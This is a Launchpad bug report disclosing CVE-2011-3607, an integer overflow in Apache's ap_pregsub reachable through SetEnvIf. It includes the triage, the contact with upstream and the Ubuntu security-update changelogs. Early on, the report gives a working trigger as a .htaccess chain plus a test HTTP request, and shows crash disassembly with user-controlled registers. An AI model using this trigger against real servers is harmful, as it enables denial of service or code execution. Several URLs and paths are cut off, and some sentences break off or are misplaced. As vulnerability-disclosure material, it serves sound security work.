Exploitable integer overflow on x86 in mod SetEnvIf, leading to buffer overwrite
| Affects | Status | Importance | Assigned to | Milestone |
|---|---|---|---|---|
| apache2 (Ubuntu) | | Low | Unassigned | |
| Hardy | | Low | Marc Deslauriers | |
| Lucid | | Low | Marc Deslauriers | |
| Maverick | | Low | Marc Deslauriers | |
| Natty | | Low | Marc Deslauriers | |
| Oneiric | | Low | Marc Deslauriers | |
| Precise | | Low | Unassigned | |
Bug Description
Apache worker on oneiric, in server/util.c, function `AP_DECLARE(char *) ap_pregsub(` contains an exploitable integer overflow when calculating the length of the buffer:
```c
else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
    len += pmatch[no].rm_eo - pmatch[no].rm_so;
}
...
dest = dst = apr_pcalloc(p, len + 1);
```
Can be triggered by placing a .htaccess file on the server with the module enabled:
```apache
SetEnvIf MyRequest "^(.*)$" TestVar=
SetEnvIf TestVar "^(.*)$" Test2Var=
SetEnvIf Test2Var "^(.*)$" Test3Var=
SetEnvIf Test3Var "^(.*)$" Test4Var=
```
Test request:
```http
GET /test/file HTTP/1.1
Host: localhost
MyRequest: 0123456789ABCDE
Connection: close
```
Result: allocates 2^6 * 2^6 * 2^6 * 2^6 * 2^8 + 1 = 2^32 + 1 bytes via apr_pcalloc.
Add some slack using "0123456789abcde" at the end of the expression to select if
```c
else if (no < nmatch && pmatch[no].rm_so < pmatch[no].rm_eo) {
    len = pmatch[no].rm_eo - pmatch[no].rm_so;
    dst += len;
}
```
or the while-loop around memcpy should segfault, usually at
```c
if (no > 9) { /* Ordinary character. */
    if (c == '\\' && (*src == '$' || *src == '&'))
        c = *src++;
    *dst++ = c;
}
```
Ubuntu security was informed 20110715, no reply so far. When the .htaccess was placed on the server, exploitation seems to be possible on non-exec segments using 2 concurrent client requests over the net. With return-
```text
0 0x002cb36b in apr_brigade_cleanup () from /usr/lib/
esi 0x46464646 1179010629
0x002cb350 <+0>: push %ebp
0x002cb351 <+1>: push %edi
0x002cb352 <+2>: push %esi
0x002cb353 <+3>: sub $0x10,%esp
0x002cb356 <+6>: mov 0x20(%esp),%edi
0x002cb35a <+10>: mov 0x4(%edi),%eax
0x002cb35d <+13>: lea 0x4(%edi),%ebp
0x002cb360 <+16>: cmp %ebp,%eax
0x002cb362 <+18>: je 0x2cb393 <apr_brigade_
0x002cb364 <+20>: lea 0x0(%esi,
0x002cb368 <+24>: mov 0x4(%edi),%esi -- user controllable
=> 0x002cb36b <+27>: mov 0x4(%esi),%eax
0x002cb36e <+30>: mov (%esi),%edx
0x002cb370 <+32>: mov %edx,(%eax) -- (esi) to (esi+4)
0x002cb372 <+34>: mov (%esi),%eax
0x002cb374 <+36>: mov 0x4(%esi),%edx
0x002cb377 <+39>: mov %edx,0x4(%eax) -- (esi+4) to ((esi)+4)
0x002cb37a <+42>: mov 0x8(%esi),%eax
0x002cb37d <+45>: mov 0x18(%esi),%edx -- 0x18 value to stack
0x002cb380 <+48>: mov %edx,(%esp)
0x002cb383 <+51>: call *0xc(%eax)
```
where esi is user controllable and can be made to point to other user-data blocks. The symlink attack from http://
```text
# lsb_release -rd
Description: Ubuntu oneiric (development branch)
Release: 11.10
# apt-cache policy apache2-mpm-worker
apache2-mpm-worker:
  Installed: 2.2.19-1ubuntu1
  Candidate: 2.2.19-1ubuntu1
  Version table:
 *** 2.2.19-1ubuntu1 0
        500 http://
        100 /var/lib/
```
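A worked model of the length overflow in the ap_pregsub() excerpt above, added here as an illustration (it is neither Apache's nor the reporter's code): it walks a substitution template the way the quoted loop does, once with a plain 32-bit sum that wraps and once with an overflow check that rejects the addition, and then runs the four-stage SetEnvIf chain with the 2^8 initial length from the report's arithmetic. The template of 64 "$1" back-references per stage and the capture lengths are constructed values, as is the `checked` variant (the page does not show the upstream fix).

```c
/* Added example, not Apache code: models the length pass of the quoted
 * ap_pregsub() loop ('&' and "$0".."$9" are back-references, "\$" and "\&"
 * escapes). match_len[N] is the length of capture N (constructed input). */
#include <stdint.h>
static uint32_t expand_len(const char *tmpl, const uint32_t *match_len,
                           int nmatch, int checked, int *overflow)
{
    uint32_t len = 0;
    const char *src = tmpl;
    int c, no;
    while ((c = *src++) != '\0') {
        no = 10;                                      /* 10 = ordinary byte */
        if (c == '&')
            no = 0;
        else if (c == '$' && *src >= '0' && *src <= '9')
            no = *src++ - '0';
        if (no > 9) {
            if (c == '\\' && (*src == '$' || *src == '&'))
                src++;                                /* escaped $ or & */
            len++;
        } else if (no < nmatch) {
            uint32_t add = match_len[no];
            if (checked && add > UINT32_MAX - len) {  /* would wrap: reject */
                *overflow = 1;
                return 0;
            }
            len += add;           /* unchecked: 32-bit wrap, as in the report */
        }
    }
    return len;
}
/* The report's chain: each SetEnvIf stage expands "$1" 64 times over the
 * previous variable's value (template constructed here, not from the page). */
static uint32_t run_chain(uint32_t initial_len, int stages, int checked, int *ov)
{
    char tmpl[129];
    uint32_t m[2] = {0, initial_len};
    for (int i = 0; i < 64; i++) { tmpl[2 * i] = '$'; tmpl[2 * i + 1] = '1'; }
    tmpl[128] = '\0';
    for (int s = 0; s < stages && !*ov; s++)
        m[1] = expand_len(tmpl, m, 2, checked, ov);
    return m[1];
}
/* 256 * 64^4 = 2^32: unchecked, four stages yield 0, so len + 1 asks
 * apr_pcalloc for 1 byte (the report's figure); checked, stage four is rejected. */
uint32_t chain_len_unchecked(uint32_t initial_len, int stages)
{ int ov = 0; return run_chain(initial_len, stages, 0, &ov); }
int chain_overflows(uint32_t initial_len, int stages)
{ int ov = 0; run_chain(initial_len, stages, 1, &ov); return ov; }
```

After three stages the unchecked and checked sums agree (2^26); the fourth stage is where the wrap to 0 happens and where the checked variant refuses, which is the point at which a bounded allocation would have to fail instead of undersizing the buffer.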
halfdog (halfdog) wrote (#1):
Marc Deslauriers (mdeslaur) wrote (#2):
Thanks for reporting this issue.
Could you please report this issue to the Apache Security Team, and possibly link the resulting bug report here.
Thanks.
Changed in apache2 (Ubuntu): importance: Undecided → Low
Marc Deslauriers (mdeslaur) wrote (#3):
See here for information on reporting this issue:
http://
Jamie Strandboge (jdstrand) wrote (#4):
What was the response from upstream?
Changed in apache2 (Ubuntu): assignee: nobody → Jamie Strandboge (jdstrand); status: New → Incomplete
halfdog (halfdog) wrote (#5):
Sent mail to <email address hidden> 2011-07-15 (no reply) and again today:
Dear Apache Httpd Security Team,
It seems possible to execute arbitrary code via the bug reported 2011-07-15. Since this requires a crafted .htaccess file on the host, this might not be too big an issue.
See http:// for a first draft of the multi-thread exploit (URL not published elsewhere).
Currently I'm trying to get more stable code executing using the stop-regex approach and just a single thread.
I checked the reporting guidelines again today and found that there is a different security contact mail address mentioned. I'm not sure if something has changed on the Apache website or I just picked up a dead address. Resending to <email address hidden>
halfdog (halfdog) wrote (#6):
Got a reply from apache-security, with a request to create an advisory.
Updated the bug information, placed an advisory stub at http://
halfdog (halfdog) wrote (#7):
Information from Joe Orton:
We'd prefer to discuss the appropriate fix for this on the public mailing list, so could you publish your advisory as soon as is convenient. We'll follow up with public discussion and patches as appropriate.
Please use the CVE name CVE-2011-3607 for this issue.
Very good discussion:
visibility: private → public
halfdog (halfdog) wrote (#8):
CVE-2011-3607 is fixed upstream in trunk, but not yet released: http://
Another CVE, CVE-2011-4415, was assigned by MITRE to the resource consumption / NULL-dereference issue.
Changed in apache2 (Ubuntu Hardy): status: New → Confirmed
Changed in apache2 (Ubuntu Lucid): status: New → Confirmed
Changed in apache2 (Ubuntu Maverick): status: New → Confirmed
Changed in apache2 (Ubuntu Natty): status: New → Confirmed
Changed in apache2 (Ubuntu Oneiric): status: New → Confirmed
Changed in apache2 (Ubuntu Precise): status: Incomplete → Fix Released; assignee: Jamie Strandboge (jdstrand) → nobody
Changed in apache2 (Ubuntu Hardy): assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Lucid): assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Maverick): assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Oneiric): assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Natty): assignee: nobody → Marc Deslauriers (mdeslaur)
Changed in apache2 (Ubuntu Hardy): importance: Undecided → Low
Changed in apache2 (Ubuntu Lucid): importance: Undecided → Low
Changed in apache2 (Ubuntu Maverick): importance: Undecided → Low
Changed in apache2 (Ubuntu Oneiric): importance: Undecided → Low
Changed in apache2 (Ubuntu Natty): importance: Undecided → Low
Launchpad Janitor (janitor) wrote (#9):
This bug was fixed in the package apache2 - 2.2.20-1ubuntu1.2
---------------
apache2 (2.2.20-1ubuntu1.2) oneiric-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service via invalid cookie
- debian/
modules/
- CVE-2012-0021
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 09:35:36 -0500
Launchpad Janitor (janitor) wrote (#10):
This bug was fixed in the package apache2 - 2.2.17-1ubuntu1.5
---------------
apache2 (2.2.17-1ubuntu1.5) natty-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service via invalid cookie
- debian/
modules/
- CVE-2012-0021
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:02:26 -0500
Launchpad Janitor (janitor) wrote (#11):
This bug was fixed in the package apache2 - 2.2.16-1ubuntu3.5
---------------
apache2 (2.2.16-1ubuntu3.5) maverick-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:11:29 -0500
Launchpad Janitor (janitor) wrote (#12):
This bug was fixed in the package apache2 - 2.2.14-5ubuntu8.8
---------------
apache2 (2.2.14-5ubuntu8.8) lucid-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:36:43 -0500
Launchpad Janitor (janitor) wrote (#13):
This bug was fixed in the package apache2 - 2.2.8-1ubuntu0.23
---------------
apache2 (2.2.8-1ubuntu0.23) hardy-security; urgency=low
* SECURITY UPDATE: arbitrary code execution via crafted SetEnvIf
directive (LP: #811422)
- debian/
server/
- CVE-2011-3607
* SECURITY UPDATE: another mod_proxy reverse proxy exposure
- debian/
modules/
server/
- CVE-2011-4317
* SECURITY UPDATE: denial of service and possible code execution via
type field modification within a scoreboard shared memory segment
- debian/
server/
- CVE-2012-0031
* SECURITY UPDATE: cookie disclosure via Bad Request errors
- debian/
server/
- CVE-2012-0053
-- Marc Deslauriers <email address hidden> Tue, 14 Feb 2012 10:49:11 -0500
Changed in apache2 (Ubuntu Hardy): status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Lucid): status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Maverick): status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Natty): status: Confirmed → Fix Released
Changed in apache2 (Ubuntu Oneiric): status: Confirmed → Fix Released
Read /proc/<pid>/maps due to time race: https://bugs.launchpad.net/ubuntu/+source/apache2/+bug/811428. Since the attacker must have been able to place .htaccess on the server, he might be able to place a symlink also.